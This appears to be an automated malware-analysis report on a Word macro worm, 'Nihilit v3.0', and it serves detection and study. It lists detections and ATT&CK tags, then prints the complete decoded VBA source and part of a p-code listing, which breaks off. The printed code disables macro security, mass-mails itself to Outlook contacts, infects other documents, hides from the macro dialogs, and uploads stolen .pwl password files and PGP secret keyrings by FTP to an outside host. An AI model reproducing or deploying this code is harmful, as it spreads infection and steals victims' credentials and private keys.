Office (OLE) malware analysis — malicious · 05b34e4d1bd96487

MALICIOUS

Office (OLE)

40.0 KB Created: 2023-06-01 04:21:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 2b0a3528a00029eda111d515092a64cd SHA-1: 2048fa5d2ffe4e8ec796792059606641771af0a7 SHA-256: 05b34e4d1bd96487b4d69cfcf08fee1e6f254bfd4d07d5505208389dffad29c0

458 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols T1055.012 Process Injection

The sample contains VBA macros with an AutoClose subroutine that attempts to disable security settings and execute a payload. The script attempts to export a component named 'Nihilit' to 'C:\Windows\Nihilit.drv', sets a registry key to disable macro security, and saves a file as 'C:\Windows\Nihilit.doc'. It also attempts to use Outlook to email itself to contacts, indicating a worm-like behavior. The ClamAV detection 'Win.Trojan.Psycho-3' further supports its malicious nature.

Heuristics 11

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell "ftp http://members.tripod.com/Nihilit/"
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
            .VirusProtection = False
```
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION

VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.
Matched line in script
```
    Set Ni_msg = Ni_OApp.CreateItem(0)
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set Ni_OApp = CreateObject("Outlook.Application")
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://members.tripod.com/Nihilit/A@� In document text (OLE body)
- http://members.tripod.com/Nihilit/�In document text (OLE body)
- http://members.tripod.com/Nihilit/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28644 bytes
SHA-256: `93191c4490c5b2abd2479ac46487ab2c31bbf060731438fc7bb571001b0f74bf`
Detection ClamAV: Doc.Trojan.Hilite-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modulo1" Sub AutoClose() On Error Resume Next Randomize sv = Int(Rnd * 3) + 1 If sv = 1 Then svt$ = "porno.doc" If sv = 3 Then svt$ = "readme!.doc" If sv = 2 Then svt$ = "sex.doc" ' Nihilit v3.0 by Necronomikon \|[Zer0 Gravity] ' thanks WalruS for help and code Call Nihilit End Sub Sub Nihilit() On Error Resume Next With Options .VirusProtection = False .ConfirmConversions = False .SaveNormalPrompt = False End With Application.DisplayAlerts = wdAlertsNone CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& ActiveDocument.ReadOnlyRecommended = False If NormalTemplate.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then ActiveDocument.VBProject.VBComponents("Nihilit").Export ("C:\Windows\Nihilit.drv") SetAttr "C:\Windows\Nihilit.drv", 6 End If ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument Set Ni_OApp = CreateObject("Outlook.Application") Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI") For Each Ni_AddList In Ni_Mapi.AddressLists Next If Ni_AddList.AddressEntries.Count <> 0 Then For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count Next Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount) Set Ni_msg = Ni_OApp.CreateItem(0) Ni_msg.To = Ni_AddListEntry.Address Ni_msg.Subject = "Check this!!!" Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit" Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc" Ni_msg.DeleteAfterSubmit = True If Ni_msg.To <> "" Then Ni_msg.Send End If Call InfectDocument If Month(Now) = Day(Now) Then Call Pwdstealer NormalTemplate.Saved = True End If End Sub Sub InfectDocument() On Error Resume Next If ActiveDocument.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then ActiveDocument.VBProject.VBComponents.import ("C:\Windows\Nihilit.drv") ActiveDocument.Save End If End Sub Sub Pwdstealer() 'thanks Fallen Angel for code... On Error Resume Next With Application.FileSearch .FileName = ".pwl" .LookIn = "c:" .Execute For i = 1 To .FoundFiles.Count Shell "ftp http://members.tripod.com/Nihilit/" Shell "nihilit" Shell "killer" Shell "post" & .FoundFiles(i) Shell "bye" Next i End With End Sub Sub ToolsOptions() On Error Resume Next Options.VirusProtection = True Options.SaveNormalPrompt = True Dialogs(wdDialogToolsOptions).Show Options.VirusProtection = False Options.SaveNormalPrompt = False End Sub Sub ToolsSecurity() On Error Resume Next CommandBars("Macro").Controls("Security...").Enabled = True Dialogs(wdDialogToolsSecurity).Show CommandBars("Macro").Controls("Security...").Enabled = False End Sub Sub FileTemplates() End Sub Sub ToolsMacro() Call Stealth Dialogs(wdDialogToolsMacro).Display End Sub Sub ViewVBCode() Call Stealth ShowVisualBasicEditor = True End Sub Sub Stealth() On Error Resume Next Application.OrganizerDelete Source:=NormalTemplate.Name, _ Name:="Nihilit", Object:=wdOrganizerObjectProjectItems Application.OrganizerDelete Source:=ActiveDocument.Name, _ Name:="Nihilit", Object:=wdOrganizerObjectProjectItems NormalTemplate.Saved = True ActiveDocument.Saved = True End Sub Sub HelpAbout() WordBasic.FileNew WordBasic.ToggleFull WordBasic.DocMaximize WordBasic.Font "Comic Sans MS" WordBasic.FontSize 60 WordBasic.Bold WordBasic.Insert "Check this!" WordBasic.StartOfLine WordBasic.CharRight 1, 1 WordBasic.FormatFont Points:="48", Color:=6 WordBasic.EndOfLine WordBasic.InsertPara WordBasic.InsertPara WordBasic.FontSize 48 WordBasic.Insert "Nihilit,v3.0 was coded by Necronomikon." End Sub Sub FileExit() On Error Resume Next Call Nihilit If ActiveDocument.Saved = False Then ActiveDocument.Save Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Nihilit Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Nihilit End If Loop ChangeFileOpenDirectory "p:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "h:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "f:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False Application.Quit End Sub Sub AutoExit() On Error Resume Next Call Nihilit Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Nihilit Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Nihilit End If Loop If ActiveDocument.Saved = False Then ActiveDocument.Save ChangeFileOpenDirectory "p:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "r:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "s:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False 'taken from WM97/Caligula by Opic[CodeBreakers] If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit3") = False) Then pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "") Position = InStr(1, pgppath, "pgpt") If Position <> 0 Then pgppath = Mid(pgppath, 1, Position - 2) Else GoTo noPGP End If With Application.FileSearch .FileName = "\Secring.skr" .LookIn = pgppath .SearchSubFolders = True .MatchTextExactly = True .FileType = msoFileTypeAllFiles .Execute PGP_Sec_Key = .FoundFiles(1) End With Randomize For i = 1 To 4 NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 Rnd)), 2, 1) Next i NewSecRingFile = "./secring" & NewSecRingFile & ".skr" Open "c:\sys.vxd" For Output As #1 Print #1, "ftp http://members.tripod.com/Nihilit/" Print #1, "user nihilit" Print #1, "pass killer" Print #1, "cd incoming" Print #1, "binary" Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """" Print #1, "quit" Close #1 Shell "command.com /c ftp.exe -n -s:c:\sys.vxd", vbHide System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit3") = True End If noPGP: Shell " ping -l 5000 -t www.gmx.de", vbHide Shell " ping -l 5000 -t www.symantec.com", vbHide End Sub ' Processing file: /tmp/qstore_a2v08h5b ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Modulo1 - 12903 bytes ' Line #0: ' FuncDefn (Sub AutoClose()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' ArgsCall Read 0x0000 ' Line #3: ' Ld Rnd ' LitDI2 0x0003 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St sv ' Line #4: ' Ld sv ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "porno.doc" ' St svt$ ' EndIf ' Line #5: ' Ld sv ' LitDI2 0x0003 ' Eq ' If ' BoSImplicit ' LitStr 0x000B "readme!.doc" ' St svt$ ' EndIf ' Line #6: ' Ld sv ' LitDI2 0x0002 ' Eq ' If ' BoSImplicit ' LitStr 0x0007 "sex.doc" ' St svt$ ' EndIf ' Line #7: ' QuoteRem 0x0000 0x002D " Nihilit v3.0 by Necronomikon \|[Zer0 Gravity]" ' Line #8: ' QuoteRem 0x0000 0x0020 " thanks WalruS for help and code" ' Line #9: ' ArgsCall (Call) Nihilit 0x0000 ' Line #10: ' EndSub ' Line #11: ' FuncDefn (Sub Nihilit()) ' Line #12: ' OnError (Resume Next) ' Line #13: ' StartWithExpr ' Ld Options ' With ' Line #14: ' LitVarSpecial (False) ' MemStWith VirusProtection ' Line #15: ' LitVarSpecial (False) ' MemStWith ConfirmConversions ' Line #16: ' LitVarSpecial (False) ' MemStWith SaveNormalPrompt ' Line #17: ' EndWith ' Line #18: ' Ld wdAlertsNone ' Ld Application ' MemSt DisplayAlerts ' Line #19: ' LitVarSpecial (False) ' LitStr 0x000B "Security..." ' LitStr 0x0005 "Macro" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #20: ' LitDI4 0x0001 0x0000 ' LitStr 0x0000 "" ' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" ' LitStr 0x0005 "Level" ' Ld System ' ArgsMemSt PrivateProfileString 0x0003 ' Line #21: ' LitVarSpecial (False) ' Ld ActiveDocument ' MemSt ReadOnlyRecommended ' Line #22: ' LitStr 0x0007 "Nihilit" ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd New ' LitStr 0x0007 "Nihilit" ' Ne ' IfBlock ' Line #23: ' LitStr 0x0016 "C:\Windows\Nihilit.drv" ' Paren ' LitStr 0x0007 "Nihilit" ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' ArgsMemCall Export 0x0001 ' Line #24: ' LitStr 0x0016 "C:\Windows\Nihilit.drv" ' LitDI2 0x0006 ' ArgsCall SetAttr 0x0002 ' Line #25: ' EndIfBlock ' Line #26: ' LitStr 0x0016 "C:\Windows\Nihilit.doc" ' ParamNamed FileName ' Ld wdFormatDocument ' ParamNamed FileFormat ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0002 ' Line #27: ' SetStmt ' LitStr 0x0013 "Outlook.Application" ' ArgsLd CreateObject 0x0001 ' Set Ni_OApp ' Line #28: ' SetStmt ' LitStr 0x0004 "MAPI" ' Ld Ni_OApp ' ArgsMemLd GetNameSpace 0x0001 ' Set Ni_Mapi ' Line #29: ' StartForVariable ' Ld Ni_AddList ' EndForVariable ' Ld Ni_Mapi ' MemLd AddressLists ' ForEach ' Line #30: ' StartForVariable ' Next ' Line #31: ' Ld Ni_AddList ' MemLd AddressEntries ' MemLd Count ' LitDI2 0x0000 ' Ne ' IfBlock ' Line #32: ' StartForVariable ' Ld Ni_AddListCount ' EndForVariable ' LitDI2 0x0001 ' Ld Ni_AddList ' MemLd AddressEntries ' MemLd Count ' For ' Line #33: ' StartForVariable ' Next ' Line #34: ' SetStmt ' Ld Ni_AddListCount ' Ld Ni_AddList ' ArgsMemLd AddressEntries 0x0001 ' Set Ni_AddListEntry ' Line #35: ' SetStmt ' LitDI2 0x0000 ' Ld Ni_OApp ' ArgsMemLd CreateItem 0x0001 ' Set Ni_msg ' Line #36: ' Ld Ni_AddListEntry ' MemLd Address ' Ld Ni_msg ' MemSt True ' Line #37: ' LitStr 0x000D "Check this!!!" ' Ld Ni_msg ' MemSt Subject ' Line #38: ' LitStr 0x0018 "I like this story!!!;o)." ' Ld vbCrLf ' Add ' LitStr 0x0007 "Nihilit" ' Add ' Ld Ni_msg ' MemSt Body ' Line #39: ' LitStr 0x0006 "WINDIR" ' ArgsLd Environ 0x0001 ' LitStr 0x000C "\Nihilit.doc" ' Concat ' Ld Ni_msg ' MemLd Attachments ' ArgsMemCall Add 0x0001 ' Line #40: ' LitVarSpecial (True) ' Ld Ni_msg ' MemSt DeleteAfterSubmit ' Line #41: ' Ld Ni_msg ' MemLd True ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #42: ' Ld Ni_msg ' ArgsMemCall Send 0x0000 ' Line #43: ' EndIfBlock ' Line #44: ' ArgsCall (Call) InfectDocument 0x0000 ' Line #45: ' Ld Now ' ArgsLd Month 0x0001 ' Ld Now ' ArgsLd Day 0x0001 ' Eq ' If ' BoSImplicit ' ArgsCall (Call) Pwdstealer 0x0000 ' EndIf ' Line #46: ' LitVarSpecial (True) ' Ld NormalTemplate ' MemSt Saved ' Line #47: ' EndIfBlock ' Line #48: ' EndSub ' Line #49: ' Line #50: ' FuncDefn (Sub InfectDocument()) ' Line #51: ' OnError (Resume Next) ' Line #52: ' LitStr 0x0007 "Nihilit" ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd New ' LitStr 0x0007 "Nihilit" ' Ne ' IfBlock ' Line #53: ' LitStr 0x0016 "C:\Windows\Nihilit.drv" ' Paren ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemCall import 0x0001 ' Line #54: ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' Line #55: ' EndIfBlock ' Line #56: ' EndSub ' Line #57: ' Line #58: ' FuncDefn (Sub Pwdstealer()) ' Line #59: ' QuoteRem 0x0000 0x001F "thanks Fallen Angel for code..." ' Line #60: ' OnError (Resume Next) ' Line #61: ' StartWithExpr ' Ld Application ' MemLd FileSearch ' With ' Line #62: ' LitStr 0x0005 ".pwl" ' MemStWith FileName ' Line #63: ' LitStr 0x0002 "c:" ' MemStWith LookIn ' Line #64: ' ArgsMemCallWith Execute 0x0000 ' Line #65: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' MemLdWith FoundFiles ' MemLd Count ' For ' Line #66: ' LitStr 0x0026 "ftp http://members.tripod.com/Nihilit/" ' ArgsCall Shell 0x0001 ' Line #67: ' LitStr 0x0007 "nihilit" ' ArgsCall Shell 0x0001 ' Line #68: ' LitStr 0x0006 "killer" ' ArgsCall Shell 0x0001 ' Line #69: ' LitStr 0x0004 "post" ' Ld i ' ArgsMemLdWith FoundFiles 0x0001 ' Concat ' ArgsCall Shell 0x0001 ' Line #70: ' LitStr 0x0003 "bye" ' ArgsCall Shell 0x0001 ' Line #71: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #72: ' EndWith ' Line #73: ' EndSub ' Line #74: ' Line #75: ' FuncDefn (Sub ToolsOptions()) ' Line #76: ' OnError (Resume Next) ' Line #77: ' LitVarSpecial (True) ' Ld Options ' MemSt VirusProtection ' Line #78: ' LitVarSpecial (True) ' Ld Options ' MemSt SaveNormalPrompt ' Line #79: ' Ld wdDialogToolsOptions ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #80: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #81: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #82: ' EndSub ' Line #83: ' Line #84: ' FuncDefn (Sub ToolsSecurity()) ' Line #85: ' OnError (Resume Next) ' Line #86: ' LitVarSpecial (True) ' LitStr 0x000B "Security..." ' LitStr 0x0005 "Macro" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #87: ' Ld wdDialogToolsSecurity ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #88: ' LitVarSpecial (False) ' LitStr 0x000B "Security..." ' LitStr 0x0005 "Macro" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #89: ' EndSub ' Line #90: ' Line #91: ' FuncDefn (Sub FileTemplates()) ' Line #92: ' EndSub ' Line #93: ' Line #94: ' FuncDefn (Sub ToolsMacro()) ' Line #95: ' ArgsCall (Call) Stealth 0x0000 ' Line #96: ' Ld wdDialogToolsMacro ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Display 0x0000 ' Line #97: ' EndSub ' Line #98: ' Line #99: ' FuncDefn (Sub ViewVBCode()) ' Line #100: ' ArgsCall (Call) Stealth 0x0000 ' Line #101: ' LitVarSpecial (True) ' St ShowVisualBasicEditor ' Line #102: ' EndSub ' Line #103: ' Line #104: ' FuncDefn (Sub Stealth()) ' Line #105: ' OnError (Resume Next) ' Line #106: ' LineCont 0x0004 09 00 04 00 ' Ld NormalTemplate ' MemLd New ' ParamNamed Source ' LitStr 0x0007 "Nihilit" ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #107: ' LineCont 0x0004 09 00 04 00 ' Ld ActiveDocument ' MemLd New ' ParamNamed Source ' LitStr 0x0007 "Nihilit" ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerDelete 0x0003 ' Line #108: ' LitVarSpecial (True) ' Ld NormalTemplate ' MemSt Saved ' Line #109: ' LitVarSpecial (True) ' Ld ActiveDocument ' MemSt Saved ' Line #110: ' EndSub ' Line #111: ' FuncDefn (Sub HelpAbout()) ' Line #112: ' Ld WordBasic ' ArgsMemCall FileNew 0x0000 ' Line #113: ' Ld WordBasic ' ArgsMemCall ToggleFull 0x0000 ' Line #114: ' Ld WordBasic ' ArgsMemCall DocMaximize 0x0000 ' Line #115: ' LitStr 0x000D "Comic Sans MS" ' Ld WordBasic ' ArgsMemCall Font 0x0001 ' Line #116: ' LitDI2 0x003C ' Ld WordBasic ' ArgsMemCall FontSize 0x0001 ' Line #117: ' Ld WordBasic ' ArgsMemCall Bold 0x0000 ' Line #118: ' LitStr 0x000B "Check this!" ' Ld WordBasic ' ArgsMemCall Insert 0x0001 ' Line #119: ' Ld WordBasic ' ArgsMemCall StartOfLine 0x0000 ' Line #120: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld WordBasic ' ArgsMemCall CharRight 0x0002 ' Line #121: ' LitStr 0x0002 "48" ' ParamNamed Points ' LitDI2 0x0006 ' ParamNamed Color ' Ld WordBasic ' ArgsMemCall FormatFont 0x0002 ' Line #122: ' Ld WordBasic ' ArgsMemCall EndOfLine 0x0000 ' Line #123: ' Ld WordBasic ' ArgsMemCall InsertPara 0x0000 ' Line #124: ' Ld WordBasic ' ArgsMemCall InsertPara 0x0000 ' Line #125: ' LitDI2 0x0030 ' Ld WordBasic ' ArgsMemCall FontSize 0x0001 ' Line #126: ' LitStr 0x0027 "Nihilit,v3.0 was coded by Necronomikon." ' Ld WordBasic ' ArgsMemCall Insert 0x0001 ' Line #127: ' EndSub ' Line #128: ' FuncDefn (Sub FileExit()) ' Line #129: ' OnError (Resume Next) ' Line #130: ' ArgsCall (Call) Nihilit 0x0000 ' Line #131: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #132: ' Ld wdWindowStateMinimize ' Ld Application ' MemSt WindowState ' Line #133: ' Ld CurDir ' LitStr 0x0001 "\" ' Concat ' St pName ' Line #134: ' Ld pName ' LitStr 0x0005 ".doc" ' Concat ' Ld sAttr ' ArgsLd Dir 0x0002 ' St fName ' Line #135: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' If ' BoSImplicit ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' EndIf ' Line #136: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #137: ' ArgsCall (Call) Nihilit 0x0000 ' Line #138: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' DoWhile ' Line #139: ' ArgsLd Dir 0x0000 ' St fName ' Line #140: ' LineCont 0x0004 07 00 00 00 ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' IfBlock ' Line #141: ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' Line #142: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #143: ' ArgsCall (Call) Nihilit 0x0000 ' Line #144: ' EndIfBlock ' Line #145: ' Loop ' Line #146: ' LitStr 0x0002 "p:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #147: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #148: ' LitStr 0x0002 "h:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #149: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #150: ' LitStr 0x0002 "f:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #151: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #152: ' Ld Application ' ArgsMemCall Quit 0x0000 ' Line #153: ' EndSub ' Line #154: ' FuncDefn (Sub AutoExit()) ' Line #155: ' OnError (Resume Next) ' Line #156: ' ArgsCall (Call) Nihilit 0x0000 ' Line #157: ' Ld wdWindowStateMinimize ' Ld Application ' MemSt WindowState ' Line #158: ' Ld CurDir ' LitStr 0x0001 "\" ' Concat ' St pName ' Line #159: ' Ld pName ' LitStr 0x0005 "*.doc" ' Concat ' Ld sAttr ' ArgsLd Dir 0x0002 ' St fName ' Line #160: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' If ' BoSImplicit ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' EndIf ' Line #161: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #162: ' ArgsCall (Call) Nihilit 0x0000 ' Line #163: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' DoWhile ' Line #164: ' ArgsLd Dir 0x0000 ' St fName ' Line #165: ' LineCont 0x0004 07 00 00 00 ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' IfBlock …

Open this report in the interactive analyzer, or submit your own file for analysis.